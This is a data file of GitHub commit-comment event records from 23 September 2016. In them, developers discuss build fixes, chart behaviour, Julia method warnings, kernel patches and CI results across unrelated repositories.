{"id":"4611332467","type":"CommitCommentEvent","actor":{"login":"monobina"},"repo":{"name":"California-Data-Collaborative/rate-comparison"},"payload":{"comment":{"id":19154139,"position":null,"line":null,"path":null,"commit_id":"f3727189834a4b9a64d9f7466c704533cf747d7d","created_at":"2016-09-23T22:50:00Z","updated_at":"2016-09-23T22:50:00Z","body":"@christophertull just realized how about adding a action button say a go button. It will not remove the charts unless the user hits the go button and  is still making changes to the numbers."}},"created_at":"2016-09-23T22:50:00Z"}
{"id":"4611332741","type":"CommitCommentEvent","actor":{"login":"harshal-hasoffers"},"repo":{"name":"GordonStewart/sdk-release"},"payload":{"comment":{"id":19154140,"position":13,"line":128,"path":"sdk-ios/Tune/Tune/Tune.m","commit_id":"67515071cac11f60d349dd0749df17750c6540f1","created_at":"2016-09-23T22:50:05Z","updated_at":"2016-09-23T22:50:05Z","body":"The end user can disable device location auto-collection thru `setShouldAutoCollectDeviceLocation:` or `setLocation:`. When this setting is disabled, it would be good to stop `SmartWhere` monitoring."}},"created_at":"2016-09-23T22:50:05Z"}
{"id":"4611334217","type":"CommitCommentEvent","actor":{"login":"shakesoda"},"repo":{"name":"zardoru/raindrop"},"payload":{"comment":{"id":19154142,"position":4,"line":122,"path":"GameData/Skins/default/screenselectmusic.lua","commit_id":"ba2b5f0e68e50feb6a32ddf49244c8b0867d4abb","created_at":"2016-09-23T22:50:32Z","updated_at":"2016-09-23T22:50:32Z","body":"Note that gamma<->linear conversion is a little more complex than this. color^2.2 is just an approximation.\r\n\r\nyou probably want this instead: https://github.com/excessive/cpml/blob/master/modules/color.lua#L205-L257"}},"created_at":"2016-09-23T22:50:32Z"}
{"id":"4611335575","type":"CommitCommentEvent","actor":{"login":"dwander"},"repo":{"name":"dwander/Prime-Kernel"},"payload":{"comment":{"id":19154145,"position":17,"line":1129,"path":"kernel/sched/core.c","commit_id":"eb326518709844d5121dba975ea10ba940f8e22d","created_at":"2016-09-23T22:50:57Z","updated_at":"2016-09-23T22:50:57Z","body":"기억은 잘 안나는데 적용하지 않을 특별한 이유는 없을듯 깊고 그 커밋을 적용하던 당시에 제가 실수를 했던게 아닌가 싶습니다. 아니면 patch 명령어를 사용하면서 파싱 오류로 누락되었을 수도 있구요.\r\n눈썰미 좋으시네요 ㅜㅜ"}},"created_at":"2016-09-23T22:50:57Z"}
{"id":"4611338890","type":"CommitCommentEvent","actor":{"login":"harshal-hasoffers"},"repo":{"name":"GordonStewart/sdk-release"},"payload":{"comment":{"id":19154152,"position":5,"line":189,"path":"sdk-android/TuneMarketingConsoleSDK/src/main/java/com/tune/Tune.java","commit_id":"2a40acc967c2f92335a00263b82b0864b54bcfd4","created_at":"2016-09-23T22:51:54Z","updated_at":"2016-09-23T22:51:54Z","body":"The end user can disable device location auto-collection thru `setShouldAutoCollectDeviceLocation` or `setLocation`. When this setting is disabled, it would be good to stop `SmartWhere` monitoring."}},"created_at":"2016-09-23T22:51:54Z"}
{"id":"4611339740","type":"CommitCommentEvent","actor":{"login":"mecctro"},"repo":{"name":"SoylentNews/rehash"},"payload":{"comment":{"id":19154153,"position":5,"line":34,"path":"Makefile","commit_id":"2ff5d58e3abc14a375127f9cfad7779eb84b6931","created_at":"2016-09-23T22:52:09Z","updated_at":"2016-09-23T22:52:09Z","body":"This is NOT cross-platform : it should be fixed. It \"should\" work on all POSIX, though."}},"created_at":"2016-09-23T22:52:09Z"}
{"id":"4611340365","type":"CommitCommentEvent","actor":{"login":"dwander"},"repo":{"name":"dwander/Prime-Kernel"},"payload":{"comment":{"id":19154154,"position":17,"line":1129,"path":"kernel/sched/core.c","commit_id":"eb326518709844d5121dba975ea10ba940f8e22d","created_at":"2016-09-23T22:52:20Z","updated_at":"2016-09-23T22:52:20Z","body":"근데 이 패치를 사용하면 버벅임이 심해진다고 해서 다른 개발자 분들은 사용을 꺼리시더라구요.\r\n제 경우엔 EAS 패치 덕분인지 아주 약간의 성능저하 외에는 없었습니다."}},"created_at":"2016-09-23T22:52:20Z"}
{"id":"4611342437","type":"CommitCommentEvent","actor":{"login":"kgoedecke"},"repo":{"name":"codetricity/osc-server"},"payload":{"comment":{"id":19154158,"position":null,"line":null,"path":null,"commit_id":"d69ddb119d566b2947fd6e5e12f988602790dcbc","created_at":"2016-09-23T22:52:54Z","updated_at":"2016-09-23T22:52:54Z","body":"Thanks man, that's a very good idea, let's do it!\r\n\r\nQuick question, is that the latest version of the code from NCTech? Where did you get the current version from? And are we good to use it in open source code?\r\n\r\nI would really like to help pushing the theta developer community, as I'm currently also developing an app for 360 virtual tours using the Ricoh Theta S.\r\n\r\nMaybe we can even setup an Orgranization for the unofficial theta dev community here on GitHub.\r\n\r\nI just saw theres a nice meetup planned for the next week, bummer I can't join you guys.\r\n\r\nGreetings from Berlin!"}},"created_at":"2016-09-23T22:52:54Z"}
{"id":"4611342927","type":"CommitCommentEvent","actor":{"login":"mecctro"},"repo":{"name":"SoylentNews/rehash"},"payload":{"comment":{"id":19154159,"position":16,"line":48,"path":"Makefile","commit_id":"2ff5d58e3abc14a375127f9cfad7779eb84b6931","created_at":"2016-09-23T22:53:04Z","updated_at":"2016-09-23T22:53:04Z","body":"Dirty fix for Apache source renaming conventions. Should be done better."}},"created_at":"2016-09-23T22:53:04Z"}
{"id":"4611344293","type":"CommitCommentEvent","actor":{"login":"montyvesselinov"},"repo":{"name":"madsjulia/Mads.jl"},"payload":{"comment":{"id":19154161,"position":4,"line":25,"path":"REQUIRE","commit_id":"db827c14bbb8b88499c01fd13624bdc848837ad2","created_at":"2016-09-23T22:53:29Z","updated_at":"2016-09-23T22:53:29Z","body":"I am also getting these WARNINGS; are there plans these to be resolved?\nWhat should I do to avoid these? Thank you very much!\n\n\nWARNING: New definition\n    ./(Images.AbstractImageDirect, AbstractArray) at\n/home/vvv/.julia/v0.4/Images/src/algorithms.jl:55\nis ambiguous with:\n    ./(AbstractArray, Union{DataArrays.DataArray,\nDataArrays.PooledDataArray}) at\n/home/vvv/.julia/v0.4/DataArrays/src/broadcast.jl:287.\nTo fix, define\n    ./(Images.AbstractImageDirect, Union{DataArrays.DataArray,\nDataArrays.PooledDataArray})\nbefore the new definition.\nWARNING: New definition\n    .==(Images.AbstractImageDirect{Bool, N<:Any}, AbstractArray{Bool,\nN<:Any}) at /home/vvv/.julia/v0.4/Images/src/algorithms.jl:187\nis ambiguous with:\n    .==(AbstractArray{Bool, N<:Any}, Union{DataArrays.DataArray{Bool,\nN<:Any}, DataArrays.PooledDataArray{Bool, R<:Integer, N<:Any}}) at\n/home/vvv/.julia/v0.4/DataArrays/src/broadcast.jl:345.\nTo fix, define\n    .==(Images.AbstractImageDirect{Bool, N<:Any},\nUnion{DataArrays.DataArray{Bool, N<:Any}, DataArrays.PooledDataArray{Bool,\nR<:Integer, N<:Any}})\nbefore the new definition.\nWARNING: New definition\n    .==(Images.AbstractImageDirect, AbstractArray) at\n/home/vvv/.julia/v0.4/Images/src/algorithms.jl:188\nis ambiguous with:\n    .==(AbstractArray{Bool, N<:Any}, Union{DataArrays.DataArray{Bool,\nN<:Any}, DataArrays.PooledDataArray{Bool, R<:Integer, N<:Any}}) at\n/home/vvv/.julia/v0.4/DataArrays/src/broadcast.jl:345.\nTo fix, define\n    .==(Images.AbstractImageDirect{Bool, N<:Any},\nUnion{DataArrays.DataArray{Bool, N<:Any}, DataArrays.PooledDataArray{Bool,\nR<:Integer, N<:Any}})\nbefore the new definition.\nWARNING: New definition\n    .==(Images.AbstractImageDirect, AbstractArray) at\n/home/vvv/.julia/v0.4/Images/src/algorithms.jl:188\nis ambiguous with:\n    .==(AbstractArray, Union{DataArrays.DataArray,\nDataArrays.PooledDataArray}) at\n/home/vvv/.julia/v0.4/DataArrays/src/broadcast.jl:287.\nTo fix, define\n    .==(Images.AbstractImageDirect, Union{DataArrays.DataArray,\nDataArrays.PooledDataArray})\nbefore the new definition.\n\n-monty\n\nOn Fri, Sep 23, 2016 at 1:20 PM, monty <velimir.vesselinov@gmail.com> wrote:\n\n> Done.\n> On Fri, Sep 23, 2016 at 12:36 PM Tony Kelman <notifications@github.com>\n> wrote:\n>\n>> best to declare a minimum version that implements the features you need,\n>> here I think it's 0.7.15 for Compat.String\n>>\n>> —\n>> You are receiving this because you authored the thread.\n>> Reply to this email directly, view it on GitHub\n>> <https://github.com/madsjulia/Mads.jl/commit/db827c14bbb8b88499c01fd13624bdc848837ad2#commitcomment-19150936>,\n>> or mute the thread\n>> <https://github.com/notifications/unsubscribe-auth/AFXxeCa1f4IC2Fadt3aY-MXiwMRzRrKqks5qtBw0gaJpZM4KFRNS>\n>> .\n>>\n> --\n> -monty\n>\n"}},"created_at":"2016-09-23T22:53:29Z"}
{"id":"4611347271","type":"CommitCommentEvent","actor":{"login":"ViniciusSato"},"repo":{"name":"ViniciusSato/teste"},"payload":{"comment":{"id":19154166,"position":null,"line":null,"path":null,"commit_id":"179b281cf3dbbae9a0a1b30167ad4815f6937ccf","created_at":"2016-09-23T22:54:21Z","updated_at":"2016-09-23T22:54:21Z","body":"muito bom! parabens"}},"created_at":"2016-09-23T22:54:21Z"}
{"id":"4611347967","type":"CommitCommentEvent","actor":{"login":"mecctro"},"repo":{"name":"SoylentNews/rehash"},"payload":{"comment":{"id":19154168,"position":72,"line":346,"path":"Makefile","commit_id":"2ff5d58e3abc14a375127f9cfad7779eb84b6931","created_at":"2016-09-23T22:54:36Z","updated_at":"2016-09-23T22:54:36Z","body":"Add missing dependencies."}},"created_at":"2016-09-23T22:54:36Z"}
{"id":"4611353549","type":"CommitCommentEvent","actor":{"login":"zenithtekla"},"repo":{"name":"zenithtekla/nodeMySQL"},"payload":{"comment":{"id":19154185,"position":null,"line":null,"path":null,"commit_id":"61f6f2c8d9202dc78b05b67ecf91ea4f08eac8c7","created_at":"2016-09-23T22:56:15Z","updated_at":"2016-09-23T22:56:15Z","body":"Note for viewers of Promises:\r\n```js\r\nmodel.bulkCreate([\r\n    { desc: \"labroom\" } , { desc: \"production\" }\r\n  ]).then(function(){\r\n     return model.findAll(); // return Promise.cast(model.findAll()); would do the same\r\n   }).then(task2);\r\n```\r\nis similar to:\r\n\r\n```js\r\nmodel.bulkCreate([\r\n    { desc: \"labroom\" } , { desc: \"production\" }\r\n  ]).then(function(){\r\n    return model.findAll().then(task2);\r\n  });\r\n```\r\n"}},"created_at":"2016-09-23T22:56:15Z"}
{"id":"4611353789","type":"CommitCommentEvent","actor":{"login":"davecheney"},"repo":{"name":"davecheney/httpstat"},"payload":{"comment":{"id":19154186,"position":58,"line":160,"path":"main.go","commit_id":"5b279239c083442431e97c7a39f55011b1a516a2","created_at":"2016-09-23T22:56:19Z","updated_at":"2016-09-23T22:56:19Z","body":"please drop this, we still need to print out the timings."}},"created_at":"2016-09-23T22:56:19Z"}
{"id":"4611355484","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"secretagentan/homework-responsive"},"payload":{"comment":{"id":19154189,"position":263,"line":305,"path":"css/style.css","commit_id":"e8665a4e1256a48d849a3bf14704b036688b5bd7","created_at":"2016-09-23T22:56:50Z","updated_at":"2016-09-23T22:56:50Z","body":"I think some good next steps would be to focus on the spacing of content on mobile, trying to limit the amount of whitespace/unused screen real-estate...For example, I think it'd be helpful to tweak the `header` styling on smaller screens so it doesn't take up so much vertical space and the call to action button begins closer to the top."}},"created_at":"2016-09-23T22:56:50Z"}
{"id":"4611355579","type":"CommitCommentEvent","actor":{"login":"davecheney"},"repo":{"name":"davecheney/httpstat"},"payload":{"comment":{"id":19154190,"position":10,"line":77,"path":"main.go","commit_id":"5b279239c083442431e97c7a39f55011b1a516a2","created_at":"2016-09-23T22:56:52Z","updated_at":"2016-09-23T22:56:52Z","body":"please add a test to travis.yml, somthing like `httpstat -I http://dave.cheney.net/` to prove this flag works."}},"created_at":"2016-09-23T22:56:52Z"}
{"id":"4611362298","type":"CommitCommentEvent","actor":{"login":"peterwtlee"},"repo":{"name":"arynchoong/MTech-KE-DWBA"},"payload":{"comment":{"id":19154205,"position":null,"line":null,"path":null,"commit_id":"3b960d1e1d9500eba8c111b9b51e9568d4ff966a","created_at":"2016-09-23T22:58:54Z","updated_at":"2016-09-23T22:58:54Z","body":"Lei Jun's data entity model has more details. Please compare against his diagram and make feel free to amend my diagram (it's in powerpoint for convenience)."}},"created_at":"2016-09-23T22:58:54Z"}
{"id":"4611364072","type":"CommitCommentEvent","actor":{"login":"mecctro"},"repo":{"name":"SoylentNews/rehash"},"payload":{"comment":{"id":19154208,"position":104,"line":402,"path":"Makefile","commit_id":"2ff5d58e3abc14a375127f9cfad7779eb84b6931","created_at":"2016-09-23T22:59:28Z","updated_at":"2016-09-23T22:59:28Z","body":"Add parallelism to compilation / testing where possible. This depends on the addition of a logical `$(CORE)` variable.\r\n\r\nThere are a few more changes like this throughout. Some portions of dependencies still currently require single-\"thread/process\"."}},"created_at":"2016-09-23T22:59:28Z"}
{"id":"4611365193","type":"CommitCommentEvent","actor":{"login":"kaiocosta"},"repo":{"name":"kaiocosta/hello-world"},"payload":{"comment":{"id":19154213,"position":5,"line":5,"path":"README.md","commit_id":"82a65d9a92a0d1fa3a4fdca09199f60c167e4597","created_at":"2016-09-23T22:59:47Z","updated_at":"2016-09-23T22:59:47Z","body":"Uma hora eu aprendo essa porra...\r\n"}},"created_at":"2016-09-23T22:59:47Z"}
{"id":"4611366073","type":"CommitCommentEvent","actor":{"login":"ejjohnson1999"},"repo":{"name":"CyanogenMod/android_device_lge_g2-common"},"payload":{"comment":{"id":19154217,"position":null,"line":null,"path":null,"commit_id":"91e0edee5f95a80219c8c63c9c23833bcfb0bbd0","created_at":"2016-09-23T23:00:04Z","updated_at":"2016-09-23T23:00:04Z","body":"Dan do you have any idea why the device wont boot with a 4.9 toolchain? It's got me stumped as to why it fails to boot and hangs at kernel splash"}},"created_at":"2016-09-23T23:00:04Z"}
{"id":"4611366631","type":"CommitCommentEvent","actor":{"login":"sbstp"},"repo":{"name":"streamlink/streamlink"},"payload":{"comment":{"id":19154221,"position":null,"line":null,"path":null,"commit_id":"183cb75deb08004ff09fab31a18b6f48721d8bc3","created_at":"2016-09-23T23:00:12Z","updated_at":"2016-09-23T23:00:12Z","body":"I don't think the archive can be done easily using `pynsist`. We need to generate a .exe that calls into Python. We might be able to salvage what the old build tools did."}},"created_at":"2016-09-23T23:00:12Z"}
{"id":"4611369159","type":"CommitCommentEvent","actor":{"login":"canosaed"},"repo":{"name":"JimGV/11IdealExtra"},"payload":{"comment":{"id":19154226,"position":null,"line":null,"path":null,"commit_id":"4b66939d96963cdff47233e60c36fd78c7aa875e","created_at":"2016-09-23T23:00:53Z","updated_at":"2016-09-23T23:00:53Z","body":"localhost:8080/proyecto-base-spring/inicioSaludo\r\npara ingresar al formulario"}},"created_at":"2016-09-23T23:00:53Z"}
{"id":"4611374785","type":"CommitCommentEvent","actor":{"login":"mecctro"},"repo":{"name":"SoylentNews/rehash"},"payload":{"comment":{"id":19154239,"position":125,"line":422,"path":"Makefile","commit_id":"2ff5d58e3abc14a375127f9cfad7779eb84b6931","created_at":"2016-09-23T23:02:29Z","updated_at":"2016-09-23T23:02:29Z","body":"xargs balances the CPU load slightly better for some of these dependencies during cpanm install.\r\n\r\nAnother update will make these type of dependencies parallel in the future by leveraging xargs similar to this way."}},"created_at":"2016-09-23T23:02:29Z"}
{"id":"4611376450","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19154249,"position":null,"line":null,"path":null,"commit_id":"0e914aa27f8a22058be58e5d9ad1800df7792708","created_at":"2016-09-23T23:02:54Z","updated_at":"2016-09-23T23:02:54Z","body":"4989-PreliminaryPIUTstatControl (mjwitte) - x86_64-MacOS-10.9-clang: OK (2339 of 2339 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-0e914aa27f8a22058be58e5d9ad1800df7792708-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-0e914aa27f8a22058be58e5d9ad1800df7792708-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-23T23:02:54Z"}
{"id":"4611376798","type":"CommitCommentEvent","actor":{"login":"Keno"},"repo":{"name":"mozilla/rr"},"payload":{"comment":{"id":19154250,"position":null,"line":null,"path":null,"commit_id":"331bf2e662a4be00d1b143fc1b186345728b280b","created_at":"2016-09-23T23:02:59Z","updated_at":"2016-09-23T23:02:59Z","body":"I have a fix. PR incoming."}},"created_at":"2016-09-23T23:02:59Z"}
{"id":"4611377685","type":"CommitCommentEvent","actor":{"login":"mecctro"},"repo":{"name":"SoylentNews/rehash"},"payload":{"comment":{"id":19154254,"position":223,"line":505,"path":"Makefile","commit_id":"2ff5d58e3abc14a375127f9cfad7779eb84b6931","created_at":"2016-09-23T23:03:13Z","updated_at":"2016-09-23T23:03:13Z","body":"Add missing dependency."}},"created_at":"2016-09-23T23:03:13Z"}
{"id":"4611379686","type":"CommitCommentEvent","actor":{"login":"spershin"},"repo":{"name":"facebook/folly"},"payload":{"comment":{"id":19154259,"position":null,"line":null,"path":null,"commit_id":"70618258130b18cae08ecd5e88de518ab38425fd","created_at":"2016-09-23T23:03:47Z","updated_at":"2016-09-23T23:03:47Z","body":"It is actually misspelled, look for \"getTFOSucceded\" instead of correct \"getTFOSucceeded\".\r\nLink:\r\nhttps://github.com/facebook/wangle/blob/master/wangle/acceptor/Acceptor.cpp"}},"created_at":"2016-09-23T23:03:47Z"}
{"id":"4611385816","type":"CommitCommentEvent","actor":{"login":"n054"},"repo":{"name":"n054/gflags"},"payload":{"comment":{"id":19154275,"position":null,"line":null,"path":null,"commit_id":"f4eace133187e0a101a6d6d71c55592b572de189","created_at":"2016-09-23T23:05:33Z","updated_at":"2016-09-23T23:05:33Z","body":"$ git commit origin"}},"created_at":"2016-09-23T23:05:33Z"}
{"id":"4611388436","type":"CommitCommentEvent","actor":{"login":"mecctro"},"repo":{"name":"SoylentNews/rehash"},"payload":{"comment":{"id":19154283,"position":234,"line":515,"path":"Makefile","commit_id":"2ff5d58e3abc14a375127f9cfad7779eb84b6931","created_at":"2016-09-23T23:06:24Z","updated_at":"2016-09-23T23:06:24Z","body":"**_BE WARNED_**\r\nFails with perl-5.24.0, requires -f / --force. Error appears to be somewhat malignant, but if issues pop up with HTML::Template in the future, this could potentially be why."}},"created_at":"2016-09-23T23:06:24Z"}
{"id":"4611391032","type":"CommitCommentEvent","actor":{"login":"miloyip"},"repo":{"name":"miloyip/json-tutorial"},"payload":{"comment":{"id":19154296,"position":null,"line":null,"path":null,"commit_id":"ed2d210f065e5f9bbadbe39b3743f9d27641ebf9","created_at":"2016-09-23T23:07:15Z","updated_at":"2016-09-23T23:07:15Z","body":"#26 "}},"created_at":"2016-09-23T23:07:15Z"}
{"id":"4611391663","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":19154299,"position":null,"line":null,"path":null,"commit_id":"aae55ecd71b34c27a20daa591441804729eae80f","created_at":"2016-09-23T23:07:28Z","updated_at":"2016-09-23T23:07:28Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#Q-elJLutTF2ZbDHPGeRrKA"}},"created_at":"2016-09-23T23:07:28Z"}
{"id":"4611399750","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19154321,"position":null,"line":null,"path":null,"commit_id":"91861fd2c6aa040aa4b94d55c9a9f3f00b3a1150","created_at":"2016-09-23T23:10:09Z","updated_at":"2016-09-23T23:10:09Z","body":"4989-PreliminaryPIUTstatControl (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1198 of 1198 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-91861fd2c6aa040aa4b94d55c9a9f3f00b3a1150-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-91861fd2c6aa040aa4b94d55c9a9f3f00b3a1150-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-91861fd2c6aa040aa4b94d55c9a9f3f00b3a1150-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-36.15%25-green.svg)</a>\n"}},"created_at":"2016-09-23T23:10:09Z"}
{"id":"4611401644","type":"CommitCommentEvent","actor":{"login":"mootpoint"},"repo":{"name":"FozLand/fozland"},"payload":{"comment":{"id":19154325,"position":null,"line":null,"path":null,"commit_id":"9e10c6763be66507aa115658938f7f90977947f7","created_at":"2016-09-23T23:10:45Z","updated_at":"2016-09-23T23:10:45Z","body":"What's the @@ and numbers for?"}},"created_at":"2016-09-23T23:10:45Z"}
{"id":"4611402877","type":"CommitCommentEvent","actor":{"login":"Orvid"},"repo":{"name":"facebook/folly"},"payload":{"comment":{"id":19154328,"position":null,"line":null,"path":null,"commit_id":"70618258130b18cae08ecd5e88de518ab38425fd","created_at":"2016-09-23T23:11:10Z","updated_at":"2016-09-23T23:11:10Z","body":"The function is there in the current version of Folly:\r\nhttps://github.com/facebook/folly/blob/master/folly/io/async/AsyncSocket.h#L446\r\n\r\nAnd Wangle's reference is correct:\r\nhttps://github.com/facebook/wangle/blob/master/wangle/acceptor/Acceptor.cpp#L241-L252"}},"created_at":"2016-09-23T23:11:10Z"}
{"id":"4611404630","type":"CommitCommentEvent","actor":{"login":"christophertull"},"repo":{"name":"California-Data-Collaborative/rate-comparison"},"payload":{"comment":{"id":19154333,"position":null,"line":null,"path":null,"commit_id":"f3727189834a4b9a64d9f7466c704533cf747d7d","created_at":"2016-09-23T23:11:46Z","updated_at":"2016-09-23T23:11:46Z","body":"Yeah I tried that before actually. The issue is that when you first load the script, the charts don't show up at all until you hit the go button. So someone could be sitting there waiting for the charts to load, not knowing that they will not appear until the button is pressed.\r\n\r\nOverall I think I prefer the disappearing charts to that..."}},"created_at":"2016-09-23T23:11:46Z"}
{"id":"4611404910","type":"CommitCommentEvent","actor":{"login":"icomrade"},"repo":{"name":"EpochModTeam/DayZ-Epoch"},"payload":{"comment":{"id":19154335,"position":null,"line":null,"path":null,"commit_id":"770378b3af4b8efa68359dbeb7e3dc080a1a4556","created_at":"2016-09-23T23:11:53Z","updated_at":"2016-09-23T23:11:53Z","body":"Changes to player_onPause in this commit were unintentional and unfinished, see https://github.com/EpochModTeam/DayZ-Epoch/commit/40d419e47573a7aacad913a95470772bb2dfa76e for the real commit."}},"created_at":"2016-09-23T23:11:53Z"}
{"id":"4611407415","type":"CommitCommentEvent","actor":{"login":"haoransun"},"repo":{"name":"haoransun/particle_physics"},"payload":{"comment":{"id":19154350,"position":1,"line":1,"path":"README.md","commit_id":"4de5c3e3616a14d55f0ba7c5d17cae5de3977d71","created_at":"2016-09-23T23:12:42Z","updated_at":"2016-09-23T23:12:42Z","body":"This is the file used to calculate incident energy of Kaon- and proton # #"}},"created_at":"2016-09-23T23:12:42Z"}
{"id":"4611409950","type":"CommitCommentEvent","actor":{"login":"jhcole"},"repo":{"name":"FozLand/fozland"},"payload":{"comment":{"id":19154359,"position":null,"line":null,"path":null,"commit_id":"9e10c6763be66507aa115658938f7f90977947f7","created_at":"2016-09-23T23:13:31Z","updated_at":"2016-09-23T23:13:31Z","body":"Thats not part of the code, its just telling you where in the file this change is. Try clicking the symbol on the left."}},"created_at":"2016-09-23T23:13:31Z"}
{"id":"4611410723","type":"CommitCommentEvent","actor":{"login":"mecctro"},"repo":{"name":"SoylentNews/rehash"},"payload":{"comment":{"id":19154361,"position":385,"line":641,"path":"Makefile","commit_id":"2ff5d58e3abc14a375127f9cfad7779eb84b6931","created_at":"2016-09-23T23:13:45Z","updated_at":"2016-09-23T23:13:45Z","body":"This is still interactive, and an additional step in the INSTALL procedure. In the future it should probably be wrapped, and called after creation of a SQL service user for rehash."}},"created_at":"2016-09-23T23:13:45Z"}
{"id":"4611412688","type":"CommitCommentEvent","actor":{"login":"GM-Script-Writer-62850"},"repo":{"name":"GM-Script-Writer-62850/Raspberry_Pi_Thermostat"},"payload":{"comment":{"id":19154368,"position":null,"line":null,"path":null,"commit_id":"1efc2805acd5a2dbdc2e70af69eb40370924540e","created_at":"2016-09-23T23:14:27Z","updated_at":"2016-09-23T23:14:27Z","body":"*is running"}},"created_at":"2016-09-23T23:14:27Z"}
{"id":"4611418259","type":"CommitCommentEvent","actor":{"login":"monobina"},"repo":{"name":"California-Data-Collaborative/rate-comparison"},"payload":{"comment":{"id":19154383,"position":null,"line":null,"path":null,"commit_id":"f3727189834a4b9a64d9f7466c704533cf747d7d","created_at":"2016-09-23T23:16:16Z","updated_at":"2016-09-23T23:16:16Z","body":"gotcha"}},"created_at":"2016-09-23T23:16:16Z"}
{"id":"4611419135","type":"CommitCommentEvent","actor":{"login":"mecctro"},"repo":{"name":"SoylentNews/rehash"},"payload":{"comment":{"id":19154386,"position":194,"line":480,"path":"Makefile","commit_id":"2ff5d58e3abc14a375127f9cfad7779eb84b6931","created_at":"2016-09-23T23:16:34Z","updated_at":"2016-09-23T23:16:34Z","body":"Used, in-part, to fix https://github.com/SoylentNews/rehash/issues/15\r\n\r\nThis is more of a plug than a fix, as the underlying cause appears to be the use of SmartMatch being experimental (as of perl-5.20.0). That said, it essentially preempts the warning triggered about the experimental status of SmartMatch."}},"created_at":"2016-09-23T23:16:34Z"}
{"id":"4611420355","type":"CommitCommentEvent","actor":{"login":"ericstj"},"repo":{"name":"dotnet/buildtools"},"payload":{"comment":{"id":19154388,"position":5,"line":261,"path":"src/Microsoft.DotNet.Build.Tasks.Packaging/src/PackageFiles/Packaging.targets","commit_id":"fc1eeba69291711d9a53c7f628766e00c7e6aa8c","created_at":"2016-09-23T23:16:57Z","updated_at":"2016-09-23T23:16:57Z","body":"This should have been an  '$(DesignTimeBuild)' != 'true'"}},"created_at":"2016-09-23T23:16:57Z"}
{"id":"4611421079","type":"CommitCommentEvent","actor":{"login":"Santikun"},"repo":{"name":"kivikakk/ifsexplorer"},"payload":{"comment":{"id":19154391,"position":null,"line":null,"path":null,"commit_id":"f1095ad2c73d2ebc7ffcf64933bf7d5b5e6106a5","created_at":"2016-09-23T23:17:13Z","updated_at":"2016-09-23T23:17:13Z","body":"Were the releases removed? I'm really interested in this project!"}},"created_at":"2016-09-23T23:17:13Z"}
{"id":"4611423079","type":"CommitCommentEvent","actor":{"login":"mecctro"},"repo":{"name":"SoylentNews/rehash"},"payload":{"comment":{"id":19154396,"position":5,"line":378,"path":"sbin/slashd","commit_id":"2ff5d58e3abc14a375127f9cfad7779eb84b6931","created_at":"2016-09-23T23:17:55Z","updated_at":"2016-09-23T23:17:55Z","body":"In perl-5.24.0 regex braces `{}` must be commented as: `\\{\\}` : This may show up more..."}},"created_at":"2016-09-23T23:17:55Z"}
{"id":"4611424308","type":"CommitCommentEvent","actor":{"login":"japalma"},"repo":{"name":"japalma/campourbano"},"payload":{"comment":{"id":19154399,"position":null,"line":null,"path":null,"commit_id":"7fa2f906d2fabcc7d2932a17690f59f41d368e23","created_at":"2016-09-23T23:18:18Z","updated_at":"2016-09-23T23:18:18Z","body":"subida"}},"created_at":"2016-09-23T23:18:18Z"}
{"id":"4611427974","type":"CommitCommentEvent","actor":{"login":"mdarc"},"repo":{"name":"deployphp/deployer"},"payload":{"comment":{"id":19154414,"position":null,"line":null,"path":null,"commit_id":"f9b8b73b568afb6f8894ec0b52b9649a9dfc6c83","created_at":"2016-09-23T23:19:29Z","updated_at":"2016-09-23T23:19:29Z","body":"Why hasn't this fix been merged in v3.3 (the latest stable release at this moment) where the issue is still present?"}},"created_at":"2016-09-23T23:19:29Z"}
{"id":"4611431514","type":"CommitCommentEvent","actor":{"login":"mecctro"},"repo":{"name":"SoylentNews/rehash"},"payload":{"comment":{"id":19154424,"position":4,"line":13,"path":"Slash/Slashboxes/Slashboxes.pm","commit_id":"2ff5d58e3abc14a375127f9cfad7779eb84b6931","created_at":"2016-09-23T23:20:37Z","updated_at":"2016-09-23T23:20:37Z","body":"Use to preempt SmartMatch warning, as described in https://github.com/SoylentNews/rehash/issues/15"}},"created_at":"2016-09-23T23:20:37Z"}
{"id":"4611433119","type":"CommitCommentEvent","actor":{"login":"TheRingMaster"},"repo":{"name":"TeslaRom-N/build"},"payload":{"comment":{"id":19154431,"position":null,"line":null,"path":null,"commit_id":"6271a4626070601257fffac4812535c7f575b436","created_at":"2016-09-23T23:21:09Z","updated_at":"2016-09-23T23:21:09Z","body":"lol"}},"created_at":"2016-09-23T23:21:09Z"}
